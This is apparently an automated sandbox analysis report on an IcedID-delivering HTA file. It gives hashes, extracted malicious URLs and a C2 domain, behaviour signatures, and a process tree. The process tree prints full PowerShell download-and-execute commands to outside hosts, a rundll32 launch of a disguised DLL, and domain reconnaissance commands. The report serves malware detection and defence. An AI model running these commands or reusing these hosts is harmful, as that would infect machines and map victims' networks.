Analysis
-
max time kernel
149s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04-02-2023 22:06
Static task
static1
Behavioral task
behavioral1
Sample
2.hta
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
2.hta
Resource
win10v2004-20221111-en
General
-
Target
2.hta
-
Size
1KB
-
MD5
78b6f14f36098c269c3d03a29eb35bc8
-
SHA1
afd76bfe0d6ac105730b218152d0a650b6a869b7
-
SHA256
c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859
-
SHA512
57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712
Malware Config
Extracted
http://helthbrotthersg.com/view.png
Extracted
https://transfer.sh/get/vpiHmi/invoice.pdf
Extracted
icedid
3954321778
ehonlionetodo.com
Signatures
-
Blocklisted process makes network request 14 IoCs
Processes:
mshta.exepowershell.exepowershell.exerundll32.exeflow pid process 4 884 mshta.exe 6 884 mshta.exe 9 672 powershell.exe 10 288 powershell.exe 11 672 powershell.exe 14 1436 rundll32.exe 16 1436 rundll32.exe 18 1436 rundll32.exe 20 1436 rundll32.exe 21 1436 rundll32.exe 22 1436 rundll32.exe 23 1436 rundll32.exe 25 1436 rundll32.exe 28 1436 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 3 IoCs
Processes:
rundll32.exerundll32.exepid process 1912 rundll32.exe 1436 rundll32.exe 1436 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 908 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 2 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\CLSID\{BC5BB61C-04A9-F961-37F7-BFEC8054F70F} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\CLSID\{BC5BB61C-04A9-F961-37F7-BFEC8054F70F}\ = cc72ba57e4cb079a8007ec9e049a21acef10fb6fa4d269ccfce51332d670d70cdc4e85174a9ee048f269da823947da60a92156bb91e151aefd20156738a287bdff083400f4ab31c936ca1e4a38444b02cc7569d69337671d374488161fcd293874418d2315f1296d8fd215db09755149d0133d91db267f73f33a888622773da3435edd197a631e82992fd70e58ca1fe575b00fade568b55f62bf86bef6484da3843c499b3a70444f47cb9aac9da48916722140b802613b1f4e444706c78cbe0a8c8fef6c24cc110f80c32456cee6fe712c475705c986a4d62f40a083c1f041 rundll32.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exerundll32.exepid process 672 powershell.exe 288 powershell.exe 1436 rundll32.exe 1436 rundll32.exe 1436 rundll32.exe 1436 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
powershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 672 powershell.exe Token: SeDebugPrivilege 288 powershell.exe Token: SeIncreaseQuotaPrivilege 1760 WMIC.exe Token: SeSecurityPrivilege 1760 WMIC.exe Token: SeTakeOwnershipPrivilege 1760 WMIC.exe Token: SeLoadDriverPrivilege 1760 WMIC.exe Token: SeSystemProfilePrivilege 1760 WMIC.exe Token: SeSystemtimePrivilege 1760 WMIC.exe Token: SeProfSingleProcessPrivilege 1760 WMIC.exe Token: SeIncBasePriorityPrivilege 1760 WMIC.exe Token: SeCreatePagefilePrivilege 1760 WMIC.exe Token: SeBackupPrivilege 1760 WMIC.exe Token: SeRestorePrivilege 1760 WMIC.exe Token: SeShutdownPrivilege 1760 WMIC.exe Token: SeDebugPrivilege 1760 WMIC.exe Token: SeSystemEnvironmentPrivilege 1760 WMIC.exe Token: SeRemoteShutdownPrivilege 1760 WMIC.exe Token: SeUndockPrivilege 1760 WMIC.exe Token: SeManageVolumePrivilege 1760 WMIC.exe Token: 33 1760 WMIC.exe Token: 34 1760 WMIC.exe Token: 35 1760 WMIC.exe Token: SeIncreaseQuotaPrivilege 1760 WMIC.exe Token: SeSecurityPrivilege 1760 WMIC.exe Token: SeTakeOwnershipPrivilege 1760 WMIC.exe Token: SeLoadDriverPrivilege 1760 WMIC.exe Token: SeSystemProfilePrivilege 1760 WMIC.exe Token: SeSystemtimePrivilege 1760 WMIC.exe Token: SeProfSingleProcessPrivilege 1760 WMIC.exe Token: SeIncBasePriorityPrivilege 1760 WMIC.exe Token: SeCreatePagefilePrivilege 1760 WMIC.exe Token: SeBackupPrivilege 1760 WMIC.exe Token: SeRestorePrivilege 1760 WMIC.exe Token: SeShutdownPrivilege 1760 WMIC.exe Token: SeDebugPrivilege 1760 WMIC.exe Token: SeSystemEnvironmentPrivilege 1760 WMIC.exe Token: SeRemoteShutdownPrivilege 1760 WMIC.exe Token: SeUndockPrivilege 1760 WMIC.exe Token: SeManageVolumePrivilege 1760 WMIC.exe Token: 33 1760 WMIC.exe Token: 34 1760 WMIC.exe Token: 35 1760 WMIC.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
mshta.exerundll32.exerundll32.execmd.exenet.exenet.exedescription pid process target process PID 884 wrote to memory of 288 884 mshta.exe powershell.exe PID 884 wrote to memory of 288 884 mshta.exe powershell.exe PID 884 wrote to memory of 288 884 mshta.exe powershell.exe PID 884 wrote to memory of 288 884 mshta.exe powershell.exe PID 884 wrote to memory of 672 884 mshta.exe powershell.exe PID 884 wrote to memory of 672 884 mshta.exe powershell.exe PID 884 wrote to memory of 672 884 mshta.exe powershell.exe PID 884 wrote to memory of 672 884 mshta.exe powershell.exe PID 884 wrote to memory of 1912 884 mshta.exe rundll32.exe PID 884 wrote to memory of 1912 884 mshta.exe rundll32.exe PID 884 wrote to memory of 1912 884 mshta.exe rundll32.exe PID 884 wrote to memory of 1912 884 mshta.exe rundll32.exe PID 884 wrote to memory of 1912 884 mshta.exe rundll32.exe PID 884 wrote to memory of 1912 884 mshta.exe rundll32.exe PID 884 wrote to memory of 1912 884 mshta.exe rundll32.exe PID 1912 wrote to memory of 1436 1912 rundll32.exe rundll32.exe PID 1912 wrote to memory of 1436 1912 rundll32.exe rundll32.exe PID 1912 wrote to memory of 1436 1912 rundll32.exe rundll32.exe PID 1912 wrote to memory of 1436 1912 rundll32.exe rundll32.exe PID 1436 wrote to memory of 1600 1436 rundll32.exe cmd.exe PID 1436 wrote to memory of 1600 1436 rundll32.exe cmd.exe PID 1436 wrote to memory of 1600 1436 rundll32.exe cmd.exe PID 1600 wrote to memory of 564 1600 cmd.exe chcp.com PID 1600 wrote to memory of 564 1600 cmd.exe chcp.com PID 1600 wrote to memory of 564 1600 cmd.exe chcp.com PID 1436 wrote to memory of 1760 1436 rundll32.exe WMIC.exe PID 1436 wrote to memory of 1760 1436 rundll32.exe WMIC.exe PID 1436 wrote to memory of 1760 1436 rundll32.exe WMIC.exe PID 1436 wrote to memory of 908 1436 rundll32.exe ipconfig.exe PID 1436 wrote to memory of 908 1436 rundll32.exe ipconfig.exe PID 1436 wrote to memory of 908 1436 rundll32.exe ipconfig.exe PID 1436 wrote to memory of 1172 1436 rundll32.exe systeminfo.exe PID 1436 wrote to memory of 1172 1436 rundll32.exe systeminfo.exe PID 1436 wrote to memory of 1172 1436 rundll32.exe systeminfo.exe PID 1436 wrote to memory of 1148 1436 rundll32.exe net.exe PID 1436 wrote to memory of 1148 1436 rundll32.exe net.exe PID 1436 wrote to memory of 1148 1436 rundll32.exe net.exe PID 1148 wrote to memory of 1776 1148 net.exe net1.exe PID 1148 wrote to memory of 1776 1148 net.exe net1.exe PID 1148 wrote to memory of 1776 1148 net.exe net1.exe PID 1436 wrote to memory of 628 1436 rundll32.exe nltest.exe PID 1436 wrote to memory of 628 1436 rundll32.exe nltest.exe PID 1436 wrote to memory of 628 1436 rundll32.exe nltest.exe PID 1436 wrote to memory of 2028 1436 rundll32.exe nltest.exe PID 1436 wrote to memory of 2028 1436 rundll32.exe nltest.exe PID 1436 wrote to memory of 2028 1436 rundll32.exe nltest.exe PID 1436 wrote to memory of 1712 1436 rundll32.exe net.exe PID 1436 wrote to memory of 1712 1436 rundll32.exe net.exe PID 1436 wrote to memory of 1712 1436 rundll32.exe net.exe PID 1436 wrote to memory of 848 1436 rundll32.exe net.exe PID 1436 wrote to memory of 848 1436 rundll32.exe net.exe PID 1436 wrote to memory of 848 1436 rundll32.exe net.exe PID 1436 wrote to memory of 1216 1436 rundll32.exe net.exe PID 1436 wrote to memory of 1216 1436 rundll32.exe net.exe PID 1436 wrote to memory of 1216 1436 rundll32.exe net.exe PID 1216 wrote to memory of 2020 1216 net.exe net1.exe PID 1216 wrote to memory of 2020 1216 net.exe net1.exe PID 1216 wrote to memory of 2020 1216 net.exe net1.exe -
outlook_office_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe -
outlook_win_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2.hta"1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\cmd.execmd.exe /c chcp >&24⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
C:\Windows\system32\net.exenet config workstation4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation5⤵
-
C:\Windows\system32\nltest.exenltest /domain_trusts4⤵
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts4⤵
-
C:\Windows\system32\net.exenet view /all /domain4⤵
- Discovers systems in the same network
-
C:\Windows\system32\net.exenet view /all4⤵
- Discovers systems in the same network
-
C:\Windows\system32\net.exenet group "Domain Admins" /domain4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 group "Domain Admins" /domain5⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
340B
MD52459c952068a2b2153873409df5e7814
SHA1792ac7137f576ae525f5227cf7386b71863f9636
SHA256023cef2e6e7976b88df6d8e0030a86897fd9296630631780c21b12bcb3e764ec
SHA512bdb3157b05a2671c4ec573088e1c9c6b274ae0eb9f1f3dbde8cada2db8bba73d042035cf9faa8df6877831638e983a9a1860c651626531bbef8eabd5574ca33d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD588aeab0039cfae0c1162500b5e8691e8
SHA1b864d7f26373bac3343073df41d99ad4d0248a9b
SHA256d6003bea1e577c4150d70a7b79bc50ee445458966a01e6bf7154ff0a10929578
SHA51207aff64fb142ad75f8351bdc39da6f895536d30741ed762f632d27e56d9d2b8c6eca7d79b383fc176e621891318714e12239e6124a710fadf92df6b0a0878d7f
-
C:\Users\Public\classic.jpgFilesize
291KB
MD56b1e64957316e65198e3a1f747402bd6
SHA1f4df8c9d37a76eadf1125a74865032d83920123b
SHA256fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
SHA512dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff
-
\??\PIPE\NETLOGONMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\sqlite64.dllFilesize
1.8MB
MD526d773a69f6fad3200d49a7aaa77752b
SHA13970ffe8aefe0c30daaec65b85fb103c0fc0f2a7
SHA256fca6b7fe66ad9973f18f407e83b56dacd04197cbd35efc498a342d73d6a113e5
SHA5120041b52514460dda19dd065fc46393f6fbe248a4c62fce28e0819abd952756996b34fdea286eb7814a7c868a12656a065278932760e61e53f7102b0dba324e4f
-
\Users\Public\classic.jpgFilesize
291KB
MD56b1e64957316e65198e3a1f747402bd6
SHA1f4df8c9d37a76eadf1125a74865032d83920123b
SHA256fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
SHA512dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff
-
\Users\Public\classic.jpgFilesize
291KB
MD56b1e64957316e65198e3a1f747402bd6
SHA1f4df8c9d37a76eadf1125a74865032d83920123b
SHA256fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
SHA512dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff
-
memory/288-61-0x0000000070600000-0x0000000070BAB000-memory.dmpFilesize
5.7MB
-
memory/288-60-0x0000000070600000-0x0000000070BAB000-memory.dmpFilesize
5.7MB
-
memory/288-54-0x0000000000000000-mapping.dmp
-
memory/564-78-0x0000000000000000-mapping.dmp
-
memory/628-85-0x0000000000000000-mapping.dmp
-
memory/672-62-0x0000000070600000-0x0000000070BAB000-memory.dmpFilesize
5.7MB
-
memory/672-59-0x0000000070600000-0x0000000070BAB000-memory.dmpFilesize
5.7MB
-
memory/672-56-0x0000000075DF1000-0x0000000075DF3000-memory.dmpFilesize
8KB
-
memory/672-55-0x0000000000000000-mapping.dmp
-
memory/848-89-0x0000000000000000-mapping.dmp
-
memory/908-80-0x0000000000000000-mapping.dmp
-
memory/1148-83-0x0000000000000000-mapping.dmp
-
memory/1172-81-0x0000000000000000-mapping.dmp
-
memory/1216-90-0x0000000000000000-mapping.dmp
-
memory/1436-76-0x000007FEFB731000-0x000007FEFB733000-memory.dmpFilesize
8KB
-
memory/1436-70-0x0000000001AF0000-0x0000000001B3C000-memory.dmpFilesize
304KB
-
memory/1436-69-0x0000000000120000-0x0000000000129000-memory.dmpFilesize
36KB
-
memory/1436-67-0x0000000000000000-mapping.dmp
-
memory/1600-77-0x0000000000000000-mapping.dmp
-
memory/1712-88-0x0000000000000000-mapping.dmp
-
memory/1760-79-0x0000000000000000-mapping.dmp
-
memory/1776-84-0x0000000000000000-mapping.dmp
-
memory/1912-63-0x0000000000000000-mapping.dmp
-
memory/2020-91-0x0000000000000000-mapping.dmp
-
memory/2028-86-0x0000000000000000-mapping.dmp